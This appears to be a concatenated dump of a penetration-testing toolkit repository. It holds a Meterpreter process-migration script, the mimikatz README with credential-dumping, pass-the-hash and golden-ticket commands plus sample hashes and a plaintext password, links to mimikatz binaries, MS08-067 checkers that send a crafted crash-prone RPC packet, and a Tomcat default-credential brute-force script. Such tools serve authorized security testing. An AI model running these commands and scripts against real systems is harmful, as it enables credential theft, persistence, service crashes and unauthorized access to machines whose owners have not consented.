  # each set in turn, stopping at the first successful migration:
  # winlogon.exe, then explorer.exe owned by the session's user, then
  # explorer.exe owned by other users.
  def run
    server = client.sys.process.open
    original_pid = server.pid
    print_status("Current server process: #{server.name} (#{server.pid})")

    uid = client.sys.config.getuid
    processes = client.sys.process.get_processes

    uid_explorer_procs = processes.select do |candidate|
      candidate['name'] == "explorer.exe" && candidate["user"] == uid
    end
    explorer_procs = processes.select do |candidate|
      candidate['name'] == "explorer.exe" && candidate["user"] != uid
    end
    winlogon_procs = processes.select do |candidate|
      candidate['name'] == "winlogon.exe"
    end

    # any? stops at the first candidate for which the migration succeeds.
    print_status "Attempting to move into winlogon.exe"
    return if winlogon_procs.any? { |candidate| attempt_migration(candidate['pid']) }

    print_status "Attempting to move into explorer.exe for current user..."
    return if uid_explorer_procs.any? { |candidate| attempt_migration(candidate['pid']) }

    print_status "Attempting to move into explorer.exe for other users..."
    return if explorer_procs.any? { |candidate| attempt_migration(candidate['pid']) }

    print_error "Was unable to sucessfully migrate into any of our likely candidates"
  end

  # Tries to migrate the session into +target_pid+.
  #
  # Returns true on success; any exception is reported with print_error and
  # turned into a false return value.
  def attempt_migration(target_pid)
    print_good("Migrating to #{target_pid}")
    client.core.migrate(target_pid)
    print_good("Successfully migrated to process #{target_pid}")
    true
  rescue ::Exception => e
    print_error("Could not migrate in to process.")
    print_error(e.to_s)
    false
  end
end
68 |
--------------------------------------------------------------------------------
/software/mimikatz_trunk/README.md:
--------------------------------------------------------------------------------
1 | # mimikatz
2 |
3 | **`mimikatz`** is a tool I've made to learn `C` and make some experiments with Windows security.
4 |
5 | It's now well known for extracting plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. **`mimikatz`** can also perform pass-the-hash, pass-the-ticket or build _Golden tickets_.
6 |
7 | ```
8 | .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
9 | .## ^ ##.
10 | ## / \ ## /* * *
11 | ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
12 | '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
13 | '#####' with 13 modules * * */
14 |
15 |
16 | mimikatz # privilege::debug
17 | Privilege '20' OK
18 |
19 | mimikatz # sekurlsa::logonpasswords
20 |
21 | Authentication Id : 0 ; 515764 (00000000:0007deb4)
22 | Session : Interactive from 2
23 | User Name : Gentil Kiwi
24 | Domain : vm-w7-ult-x
25 | SID : S-1-5-21-1982681256-1210654043-1600862990-1000
26 | msv :
27 | [00000003] Primary
28 | * Username : Gentil Kiwi
29 | * Domain : vm-w7-ult-x
30 | * LM : d0e9aee149655a6075e4540af1f22d3b
31 | * NTLM : cc36cf7a8514893efccd332446158b1a
32 | * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
33 | tspkg :
34 | * Username : Gentil Kiwi
35 | * Domain : vm-w7-ult-x
36 | * Password : waza1234/
37 | ...
38 | ```
39 | But that's not all! `Crypto`, `Terminal Server`, `Events`, ... lots of information in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, _yes_).
40 |
41 | If you don't want to build it, binaries are available on https://github.com/gentilkiwi/mimikatz/releases
42 |
43 |
44 | ## Quick usage
45 | ```
46 | log
47 | privilege::debug
48 | ```
49 |
50 | ### sekurlsa
51 | ```
52 | sekurlsa::logonpasswords
53 | sekurlsa::tickets /export
54 |
55 | sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
56 | ```
57 |
58 | ### kerberos
59 | ```
60 | kerberos::list /export
61 | kerberos::ptt c:\chocolate.kirbi
62 |
63 | kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
64 | ```
65 |
66 | ### crypto
67 | ```
68 | crypto::capi
69 | crypto::cng
70 |
71 | crypto::certificates /export
72 | crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
73 |
74 | crypto::keys /export
75 | crypto::keys /machine /export
76 | ```
77 |
78 | ### vault & lsadump
79 | ```
80 | vault::cred
81 | vault::list
82 |
83 | token::elevate
84 | vault::cred
85 | vault::list
86 | lsadump::sam
87 | lsadump::secrets
88 | lsadump::cache
89 | token::revert
90 | ```
91 |
92 | ## Build
93 | `mimikatz` is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:
94 | * for `mimikatz` and `mimilib` : Visual Studio 2010, 2012 or 2013 for Desktop (**2013 Express for Desktop is free and supports x86 & x64** - http://www.microsoft.com/download/details.aspx?id=43733)
95 | * _for `mimikatz driver` (and `ddk2003` platform) : Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800_
96 |
97 | `mimikatz` uses `SVN` for source control, but is now available with `GIT` too!
98 | You can use any tools you want to sync, even incorporated `GIT` in Visual Studio 2013 =)
99 |
100 | ### Synchronize!
101 | * GIT URL is : https://github.com/gentilkiwi/mimikatz.git
102 | * SVN URL is : https://github.com/gentilkiwi/mimikatz/trunk
103 | * ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip
104 |
105 | ### Build the solution
106 | * After opening the solution, `Build` / `Build Solution` (you can change architecture)
107 | * `mimikatz` is now built and ready to be used! (`Win32` / `x64`)
108 | * you may get error `MSB3073` about `_build_.cmd` and `mimidrv`; this is because the driver cannot be built without Windows Driver Kit **7.1** (WinDDK), but `mimikatz` and `mimilib` are OK.
109 |
110 | ### ddk2003
111 | With this optional MSBuild platform, you can use the WinDDK build tools, and the default `msvcrt` runtime (smaller binaries, no dependencies)
112 |
113 | For this optional platform, Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio **2010** are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.
114 |
115 | Follow instructions:
116 | * http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
117 | * _http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader_
118 |
119 | ## Licence
120 | CC BY 3.0 FR licence - http://creativecommons.org/licenses/by/3.0/fr/
121 |
122 | ## Author
123 | Benjamin DELPY `gentilkiwi`, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )
124 |
125 | This is a **personal** development, please respect its philosophy and don't use it for bad things!
--------------------------------------------------------------------------------
/software/mimikatz_trunk/Win32/mimidrv.sys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/software/mimikatz_trunk/Win32/mimidrv.sys
--------------------------------------------------------------------------------
/software/mimikatz_trunk/Win32/mimikatz.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/software/mimikatz_trunk/Win32/mimikatz.exe
--------------------------------------------------------------------------------
/software/mimikatz_trunk/Win32/mimilib.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/software/mimikatz_trunk/Win32/mimilib.dll
--------------------------------------------------------------------------------
/software/mimikatz_trunk/x64/mimidrv.sys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/software/mimikatz_trunk/x64/mimidrv.sys
--------------------------------------------------------------------------------
/software/mimikatz_trunk/x64/mimikatz.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/software/mimikatz_trunk/x64/mimikatz.exe
--------------------------------------------------------------------------------
/software/mimikatz_trunk/x64/mimilib.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sensepost/autoDANE/50153da2521c78bb11e8bcf95930614abaf55e5f/software/mimikatz_trunk/x64/mimilib.dll
--------------------------------------------------------------------------------
/software/ms08-067_check/COPYING:
--------------------------------------------------------------------------------
1 | We provide this software under a slightly modified version of the
2 | Apache Software License. The only changes to the document were the
3 | replacement of "Apache" with "Impacket" and "Apache Software Foundation"
4 | with "CORE Security Technologies". Feel free to compare the resulting
5 | document to the official Apache license.
6 |
7 | The `Apache Software License' is an Open Source Initiative Approved
8 | License.
9 |
10 | The Apache Software License, Version 1.1
11 | Modifications by CORE Security Technologies (see above)
12 |
13 | Copyright (c) 2000 The Apache Software Foundation. All rights
14 | reserved.
15 |
16 | Redistribution and use in source and binary forms, with or without
17 | modification, are permitted provided that the following conditions
18 | are met:
19 |
20 | 1. Redistributions of source code must retain the above copyright
21 | notice, this list of conditions and the following disclaimer.
22 |
23 | 2. Redistributions in binary form must reproduce the above copyright
24 | notice, this list of conditions and the following disclaimer in
25 | the documentation and/or other materials provided with the
26 | distribution.
27 |
28 | 3. The end-user documentation included with the redistribution,
29 | if any, must include the following acknowledgment:
30 | "This product includes software developed by
31 | CORE Security Technologies (http://www.coresecurity.com/)."
32 | Alternately, this acknowledgment may appear in the software itself,
33 | if and wherever such third-party acknowledgments normally appear.
34 |
35 | 4. The names "Impacket" and "CORE Security Technologies" must
36 | not be used to endorse or promote products derived from this
37 | software without prior written permission. For written
38 | permission, please contact oss@coresecurity.com.
39 |
40 | 5. Products derived from this software may not be called "Impacket",
41 | nor may "Impacket" appear in their name, without prior written
42 | permission of CORE Security Technologies.
43 |
44 | THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED
45 | WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
46 | OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
47 | DISCLAIMED. IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR
48 | ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
49 | SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
50 | LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
51 | USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
52 | ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
53 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
54 | OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
55 | SUCH DAMAGE.
56 |
57 | Smb.py and nmb.py are based on Pysmb by Michael Teo
58 | (http://miketeo.net/projects/pysmb/), and are distributed under the
59 | following license:
60 |
61 | This software is provided 'as-is', without any express or implied
62 | warranty. In no event will the author be held liable for any damages
63 | arising from the use of this software.
64 |
65 | Permission is granted to anyone to use this software for any purpose,
66 | including commercial applications, and to alter it and redistribute it
67 | freely, subject to the following restrictions:
68 |
69 | 1. The origin of this software must not be misrepresented; you must
70 | not claim that you wrote the original software. If you use this
71 | software in a product, an acknowledgment in the product
72 | documentation would be appreciated but is not required.
73 |
74 | 2. Altered source versions must be plainly marked as such, and must
75 | not be misrepresented as being the original software.
76 |
77 | 3. This notice cannot be removed or altered from any source
78 | distribution.
79 |
--------------------------------------------------------------------------------
/software/ms08-067_check/ms08-067.nse:
--------------------------------------------------------------------------------
1 | local msrpc = require "msrpc"
2 | local nmap = require "nmap"
3 | local smb = require "smb"
4 | local stdnse = require "stdnse"
5 | local string = require "string"
6 | local table = require "table"
7 |
8 | description = [[
9 | Checks for vulnerabilities:
10 | * MS08-067, a Windows RPC vulnerability
11 | * Conficker, an infection by the Conficker worm
12 | * Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in Windows 2000
13 | * SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
14 | * MS06-025, a Windows Ras RPC service vulnerability
15 | * MS07-029, a Windows Dns Server RPC service vulnerability
16 |
17 | WARNING: These checks are dangerous, and are very likely to bring down a server.
18 | These should not be run in a production environment unless you (and, more importantly,
19 | the business) understand the risks!
20 |
21 | As a system administrator, performing these kinds of checks is crucial, because
22 | a lot more damage can be done by a worm or a hacker using this vulnerability than
23 | by a scanner. Penetration testers, on the other hand, might not want to use this
24 | script -- crashing services is not generally a good way of sneaking through a
25 | network.
26 |
27 | If you set the script parameter unsafe
, then scripts will run that are almost
28 | (or totally) guaranteed to crash a vulnerable system; do NOT specify unsafe
29 | in a production environment! And that isn't to say that non-unsafe scripts will
30 | not crash a system, they're just less likely to.
31 |
32 | If you set the script parameter safe
, then script will run that rarely or never
33 | crash a vulnerable system. No promises, though.
34 |
35 | MS08-067. Checks if a host is vulnerable to MS08-067, a Windows RPC vulnerability that
36 | can allow remote code execution. Checking for MS08-067 is very dangerous, as the check
37 | is likely to crash systems. On a fairly wide scan conducted by Brandon Enright, we determined
38 | that on average, a vulnerable system is more likely to crash than to survive
39 | the check. Out of 82 vulnerable systems, 52 crashed.
40 | At the same time, MS08-067 is extremely critical to fix. Metasploit has a working and
41 | stable exploit for it, and any system vulnerable can very easily be compromised.
42 | Conficker. Checks if a host is infected with a known Conficker strain. This check
43 | is based on the simple conficker scanner found on this page:
44 | http://iv.cs.uni-bonn.de/wg/cs/applications/containing-conficker.
45 | Thanks to the folks who wrote that scanner!
46 |
47 | regsvc DoS. Checks if a host is vulnerable to a crash in regsvc, caused
48 | by a null pointer dereference. I inadvertently discovered this crash while working
49 | on smb-enum-sessions
, and discovered that it was repeatable. It's been
50 | reported to Microsoft (case #MSRC8742).
51 |
52 | This check WILL crash the service, if it's vulnerable, and requires a guest account
53 | or higher to work. It is considered unsafe
.
54 |
55 | SMBv2 DoS. Performs a denial-of-service against the vulnerability disclosed in
56 | CVE-2009-3103. Checks if the server went offline. This works against Windows Vista
57 | and some versions of Windows 7, and causes a bluescreen if successful. The
58 | proof-of-concept code at http://seclists.org/fulldisclosure/2009/Sep/39 was used,
59 | with one small change.
60 |
61 | MS06-025. Vulnerability targets the RasRpcSumbitRequest()
RPC method which is
62 | a part of RASRPC interface that serves as a RPC service for configuring and
63 | getting information from the Remote Access and Routing service. RASRPC can be
64 | accessed using either "\ROUTER" SMB pipe or the "\SRVSVC" SMB pipe (usually on Windows XP machines).
65 | This is in RPC world known as "ncan_np" RPC transport. RasRpcSumbitRequest()
66 | method is a generic method which provides different functionalities according
67 | to the RequestBuffer
structure and particularly the RegType
field within that
68 | structure. RegType
field is of enum ReqTypes
type. This enum type lists all
69 | the different available operation that can be performed using the RasRpcSubmitRequest()
70 | RPC method. The one particular operation that this vuln targets is the REQTYPE_GETDEVCONFIG
71 | request to get device information on the RRAS.
72 |
73 | MS07-029. Vulnerability targets the R_DnssrvQuery()
and R_DnssrvQuery2()
RPC method which is
74 | a part of DNS Server RPC interface that serves as a RPC service for configuring and
75 | getting information from the DNS Server service. DNS Server RPC service can be
76 | accessed using "\dnsserver" SMB named pipe. The vulnerability is triggered when
77 | a long string is send as the "zone" parameter which causes the buffer overflow which
78 | crashes the service.
79 |
80 | (Note: if you have other SMB/MSRPC vulnerability checks you'd like to see added, and
81 | you can show me a tool with a license that is compatible with Nmap's, post a request
82 | on the nmap-dev mailing list and I'll add it to my list [Ron Bowes].)
83 | ]]
84 | ---
85 | --@usage
86 | -- nmap --script smb-check-vulns.nse -p445
87 | -- sudo nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139
88 | --
89 | --@output
90 | -- Host script results:
91 | -- | smb-check-vulns:
92 | -- | MS08-067: NOT VULNERABLE
93 | -- | Conficker: Likely CLEAN
94 | -- | regsvc DoS: regsvc DoS: NOT VULNERABLE
95 | -- | SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
96 | -- | MS06-025: NO SERVICE (the Ras RPC service is inactive)
97 | -- |_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
98 | --
99 | -- @args unsafe If set, this script will run checks that, if the system isn't
100 | -- patched, are basically guaranteed to crash something. Remember that
101 | -- non-unsafe checks aren't necessarily safe either)
102 | -- @args safe If set, this script will only run checks that are known (or at
103 | -- least suspected) to be safe.
104 | -----------------------------------------------------------------------
105 |
106 | author = "Ron Bowes"
107 | copyright = "Ron Bowes"
108 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
109 | categories = {"intrusive","exploit","dos","vuln"}
110 | -- run after all smb-* scripts (so if it DOES crash something, it doesn't kill
111 | -- other scans have had a chance to run)
112 | dependencies = {
113 | "smb-brute", "smb-enum-sessions", "smb-security-mode",
114 | "smb-enum-shares", "smb-server-stats",
115 | "smb-enum-domains", "smb-enum-users", "smb-system-info",
116 | "smb-enum-groups", "smb-os-discovery", "smb-enum-processes",
117 | "smb-psexec",
118 | };
119 |
120 |
-- Host rule: the script applies to a host only when smb.get_port() finds an
-- SMB port for it.
hostrule = function(host)
  local smb_port = smb.get_port(host)
  return smb_port ~= nil
end
124 |
-- Result codes returned by check_ms08_067() and turned into text by action().
-- INFECTED2, CLEAN and NOTUP are not referenced by the code visible in this copy.
125 | local VULNERABLE = 1
126 | local PATCHED = 2
127 | local UNKNOWN = 3
128 | local NOTRUN = 4
129 | local INFECTED = 5
130 | local INFECTED2 = 6
131 | local CLEAN = 7
132 | local NOTUP = 8
133 |
---Check whether a host is patched for MS08-067.
--
-- The check calls NetPathCompare over SRVSVC with an illegal path string. A
-- call that succeeds is reported as vulnerable; a rejected call is classified
-- by the error text that comes back.
--
-- Based on a packet capture of the Portcullis checker; thanks go out to its
-- author: http://labs.portcullis.co.uk/application/ms08-067-check/
-- If there's a licensing issue, please let Ron Bowes know.
--
-- NOTE: this CAN crash things (ie, crash svchost and force a reboot). The
-- original author saw one crash in about 20 tests; that is not a guarantee.
--
-- NOTE: the safe/unsafe script-argument gate is commented out in this copy,
-- so the check always runs and NOTRUN is never returned from here.
--
--@param host The host object.
--@return (status, result[, detail]) If status is false, result is an error
--        message from the SMB/RPC layer. Otherwise result is VULNERABLE when
--        the call was accepted, INFECTED when the error text contains
--        "WERR_INVALID_PARAMETER", PATCHED when it contains "INVALID_NAME",
--        and UNKNOWN (with the raw error text as detail) for any other error.
function check_ms08_067(host)
  -- Create the SMB session
  local status, smbstate = msrpc.start_smb(host, "\\\\BROWSER")
  if status == false then
    return false, smbstate
  end

  -- Bind to the SRVSVC service; the session is closed again on failure
  local bind_result
  status, bind_result = msrpc.bind(smbstate, msrpc.SRVSVC_UUID, msrpc.SRVSVC_VERSION, nil)
  if status == false then
    msrpc.stop_smb(smbstate)
    return false, bind_result
  end

  -- Call NetPathCompare with the test paths
  local path1 = "\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\..\\n"
  local path2 = "\\n"
  local netpathcompare_result
  status, netpathcompare_result = msrpc.srvsvc_netpathcompare(smbstate, host.ip, path1, path2, 1, 0)

  -- Stop the SMB session before interpreting the result
  msrpc.stop_smb(smbstate)

  -- An accepted call means the path was not rejected
  if status ~= false then
    return true, VULNERABLE
  end

  if string.find(netpathcompare_result, "WERR_INVALID_PARAMETER") ~= nil then
    return true, INFECTED
  end
  if string.find(netpathcompare_result, "INVALID_NAME") ~= nil then
    return true, PATCHED
  end
  return true, UNKNOWN, netpathcompare_result
end
197 |
---Build the output line for one check, if it should be shown.
--
--@param check The name of the check; for example, 'ms08-067'.
--@param message The message to display, such as 'VULNERABLE' or 'PATCHED'.
--@param description [optional] Extra details about the message; nil or '' for none.
--@param minimum_verbosity The minimum verbosity level required before the message is displayed.
--@param minimum_debug [optional] The minimum debug level required before the message is displayed (default: 0).
--@return "check: message" or "check: message (description)", or nil when the
--        current verbosity or debug level is below the required minimum.
local function get_response(check, message, description, minimum_verbosity, minimum_debug)
  if minimum_debug == nil then
    minimum_debug = 0
  end

  -- Suppress the line unless both thresholds are met
  local visible = nmap.verbosity() >= minimum_verbosity and nmap.debugging() >= minimum_debug
  if not visible then
    return nil
  end

  local has_description = not (description == nil or description == '')
  if has_description then
    return string.format("%s: %s (%s)", check, message, description)
  end
  return string.format("%s: %s", check, message)
end
222 |
-- Script action: run the MS08-067 check against the host and format its
-- result code as a single output line.
action = function(host)
  local response = {}

  -- Check for ms08-067
  local status, result = check_ms08_067(host)

  local line
  if status == false then
    -- The error text is shown only at debug level 1 or higher
    line = get_response("MS08-067", "ERROR", result, 0, 1)
  elseif result == VULNERABLE then
    line = get_response("MS08-067", "VULNERABLE", nil, 0)
  elseif result == UNKNOWN then
    line = get_response("MS08-067", "LIKELY VULNERABLE", "host stopped responding", 1) -- TODO: this isn't very accurate
  elseif result == NOTRUN then
    line = get_response("MS08-067", "CHECK DISABLED", "add '--script-args=unsafe=1' to run", 1)
  elseif result == INFECTED then
    line = get_response("MS08-067", "NOT VULNERABLE", "likely by Conficker", 0)
  else
    line = get_response("MS08-067", "NOT VULNERABLE", nil, 1)
  end
  table.insert(response, line)

  return stdnse.format_output(true, response)
end
248 |
--------------------------------------------------------------------------------
/software/ms08-067_check/ms08-067_check.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | '''
4 | Name: Microsoft Server Service Remote Path Canonicalization Stack Overflow Vulnerability
5 |
6 | Description:
7 | Anonymously check if a target machine is affected by MS08-067 (Vulnerability in Server Service Could Allow Remote Code Execution)
8 |
9 | Author: Bernardo Damele A. G.
10 |
11 | License: Modified Apache 1.1
12 |
13 | Version: 0.6
14 |
15 | References:
16 | * BID: 31874
17 | * CVE: 2008-4250
18 | * MSB: MS08-067
19 | * VENDOR: http://blogs.technet.com/swi/archive/2008/10/25/most-common-questions-that-we-ve-been-asked-regarding-ms08-067.aspx
20 | * VENDOR: http://www.microsoft.com/technet/security/advisory/958963.mspx
21 | * MISC: http://www.phreedom.org/blog/2008/decompiling-ms08-067/
22 | * MISC: http://metasploit.com/dev/trac/browser/framework3/trunk/modules/exploits/windows/smb/ms08_067_netapi.rb
23 | * MISC: http://blog.threatexpert.com/2008/10/gimmiva-exploits-zero-day-vulnerability.html
24 | * MISC: http://blogs.securiteam.com/index.php/archives/1150
25 |
26 | Tested:
27 | * Windows 2000 Server Service Pack 0
28 | * Windows 2000 Server Service Pack 4 with Update Rollup 1
29 | * Microsoft 2003 Standard Service Pack 1
30 | * Microsoft 2003 Standard Service Pack 2 Full Patched at 22nd of October 2008, before MS08-067 patch was released
31 |
32 | Notes:
33 | * On Windows XP SP2 and SP3 this check might lead to a race condition and
34 | heap corruption in the svchost.exe process, but it may not crash the
35 | service immediately: it can trigger later on inside any of the shared
36 | services in the process.
37 | '''
38 |
39 |
40 | import socket
41 | import sys
42 |
43 | from optparse import OptionError
44 | from optparse import OptionParser
45 | from random import choice
46 | from string import letters
47 | from struct import pack
48 | from threading import Thread
49 | from traceback import format_exc
50 |
51 | try:
52 | from impacket import smb
53 | from impacket import uuid
54 | from impacket.dcerpc import dcerpc
55 | from impacket.dcerpc import transport
56 | except ImportError, _:
57 | print 'ERROR: this tool requires python-impacket library to be installed, get it '
58 | print 'from http://oss.coresecurity.com/projects/impacket.html or apt-get install python-impacket'
59 | sys.exit(1)
60 |
61 | try:
62 | from ndr import *
63 | except ImportError, _:
64 | print 'ERROR: this tool requires python-pymsrpc library to be installed, get it '
65 | print 'from http://code.google.com/p/pymsrpc/'
66 | sys.exit(1)
67 |
68 |
69 | CMDLINE = False
70 | SILENT = False
71 |
72 |
class connectionException(Exception):
    '''
    Raised by the port, SMB connect and DCERPC bind steps when the target
    cannot be reached or refuses the request
    '''
75 |
76 |
77 | class MS08_067(Thread):
def __init__(self, target, port=445):
    '''
    Set up the checker thread for a single target

    target: address of the host to check
    port: TCP port used by the reachability probe (default 445)
    '''

    super(MS08_067, self).__init__()

    # No result yet: status starts out as 'unknown'
    self.status = 'unknown'
    self.target = target
    self.__port = port
84 |
85 |
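def __checkPort(self):
    '''
    Open connection to TCP port to check if it is open

    Raises connectionException('connection timeout') when the 1-second
    connect attempt times out, and connectionException('connection refused')
    on any other socket error.
    '''

    s = None

    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(1)
        s.connect((self.target, self.__port))

    # socket.timeout must be tested before the more general socket.error
    except socket.timeout:
        raise connectionException('connection timeout')

    except socket.error:
        raise connectionException('connection refused')

    finally:
        # Close on the failure paths too, so a scan over many unreachable
        # targets does not accumulate open descriptors
        if s is not None:
            s.close()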
102 |
103 |
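def __connect(self):
    '''
    SMB connect to the Computer Browser service named pipe
    Reference: http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_browser.html

    Stores the transport in self.__trans. Raises connectionException when
    the SMB session is refused or any other error occurs.
    '''

    try:
        self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
        self.__trans.connect()

    except smb.SessionError:
        # No credentials are supplied here, so a target that rejects the
        # session ends the check at this step
        raise connectionException('access denied (RestrictAnonymous is probably set to 2)')

    except Exception:
        # Exception rather than a bare except, so KeyboardInterrupt and
        # SystemExit are not rewritten into a connection error. The original
        # error detail is dropped; format_exc() is imported for debugging it.
        raise connectionException('unexpected exception')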
120 |
121 |
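def __bind(self):
    '''
    DCERPC bind to SRVSVC (Server Service) endpoint
    Reference: http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_srvsvc.html

    Uses the transport stored in self.__trans and keeps the DCERPC object in
    self.__dce. Raises connectionException when the bind fails.
    '''

    try:
        self.__dce = self.__trans.DCERPC_class(self.__trans)

        # Interface UUID and version passed to bind() for the SRVSVC endpoint
        self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))

    except socket.error:
        raise connectionException('unable to bind to SRVSVC endpoint')

    except Exception:
        # Exception rather than a bare except, so KeyboardInterrupt and
        # SystemExit are not rewritten into a connection error. The original
        # error detail is dropped; format_exc() is imported for debugging it.
        raise connectionException('unexpected exception')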
139 |
140 |
def __forgePacket(self):
    '''
    Forge the malicious NetprPathCompare packet

    Reference: http://msdn.microsoft.com/en-us/library/cc247259.aspx

    long NetprPathCompare(
      [in, string, unique] SRVSVC_HANDLE ServerName,
      [in, string] WCHAR* PathName1,
      [in, string] WCHAR* PathName2,
      [in] DWORD PathType,
      [in] DWORD Flags
    );

    Only builds the request: the serialized bytes are stored in
    self.__request and nothing is sent from this method.
    '''

    # NOTE: the module docstring records that on Windows XP SP2 and SP3 this
    # check might lead to heap corruption in svchost.exe that surfaces later,
    # so running it is not free of side effects for the target.

    # Random three-letter path component, regenerated on every call
    self.__path = ''.join([choice(letters) for _ in xrange(0, 3)])

    # Five fields are serialized and appended in sequence; presumably one per
    # parameter of the prototype above, in the same order -- verify against
    # the ndr module
    self.__request = ndr_unique(pointer_value=0x00020000, data=ndr_wstring(data='')).serialize()
    self.__request += ndr_wstring(data='\\%s\\..\\%s' % ('A'*5, self.__path)).serialize()
    self.__request += ndr_wstring(data='\\%s' % self.__path).serialize()
    self.__request += ndr_long(data=1).serialize()
    self.__request += ndr_long(data=0).serialize()
163 |
164 |
165 | def __compare(self):
166 | '''
167 | Compare NetprPathCompare response field 'Windows Error' with the
168 | expected value (WERR_OK) to confirm the target is vulnerable
169 | '''
170 |
171 | self.__vulnerable = pack('
26 | -- Todo: Better identification of tomcat
27 | -- Checkout: http://www.binaryvision.org.il/
28 | -----------------------------------------------------------------
29 |
author = "spdr"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

-- NOTE(review): "default" and "intrusive" are declared together. The action
-- in this script sends credential guesses to /manager/html, so listing it
-- under "default" presumably makes it part of default script scans as well
-- -- confirm that is intended.
categories = {"default", "auth", "intrusive"}

local shortport = require "shortport"
local http = require "http"

-- The script runs against ports matched by shortport.http.
portrule = shortport.http
40 |
--- Reports how /manager/html responds and whether one of the built-in
-- username/password pairs is accepted.
--
-- Requests /manager/html and /jmx-console/HtmlAdaptor once each, then, if the
-- server answers 401 with a Basic challenge, repeats the /manager/html request
-- with each pair from authcombinations until a response is neither 401 nor 403.
--
-- Each guess is a separate GET carrying credentials, 32 at most for the list
-- below, so a run presumably appears in the server's access log as a short
-- burst of 401 responses to /manager/html from one client -- confirm against
-- the server's logging. Replacing or removing accounts with these values, and
-- a lock-out policy on the manager realm (for example Tomcat's LockOutRealm),
-- are the corresponding mitigations.
--
--@param host Passed through to http.get.
--@param port Passed through to http.get.
--@return The collected result lines joined with newlines.
action = function(host, port)
  local www_authenticate
  local challenges, basic_challenge
  -- Fixed list of guesses, tried in the order written here.
  local authcombinations= {
    { username = "admin", password = ""},
    { username = "admin", password = "admin"},
    { username = "admin", password = "tomcat"},
    { username = "admin", password = "manager"},
    { username = "admin", password = "secret"},
    { username = "admin", password = "1234"},
    { username = "admin", password = "12345"},
    { username = "admin", password = "123456"},
    { username = "admin", password = "12345678"},
    { username = "admin", password = "password"},
    { username = "admin", password = "changeit"},
    { username = "admin", password = "changeme"},
    { username = "tomcat", password = "tomcat"},
    { username = "tomcat", password = ""},
    { username = "tomcat", password = "admin"},
    { username = "tomcat", password = "manager"},
    { username = "tomcat", password = "secret"},
    { username = "tomcat", password = "1234"},
    { username = "tomcat", password = "12345"},
    { username = "tomcat", password = "123123"},
    { username = "tomcat", password = "123321"},
    { username = "tomcat", password = "123456"},
    { username = "tomcat", password = "12345678"},
    { username = "manager", password = "manager"},
    { username = "manager", password = "tomcat"},
    { username = "manager", password = "admin"},
    { username = "manager", password = "1234"},
    { username = "manager", password = "12345"},
    { username = "manager", password = "123456"},
    { username = "manager", password = "123123"},
    { username = "manager", password = "1234578"},
    { username = "QCC", password = "QLogic66"},
  }

  local result = {}
  -- Both requests are always sent; the JBoss response is only reported in
  -- the 404 branch below.
  local answer = http.get(host, port, "/manager/html")
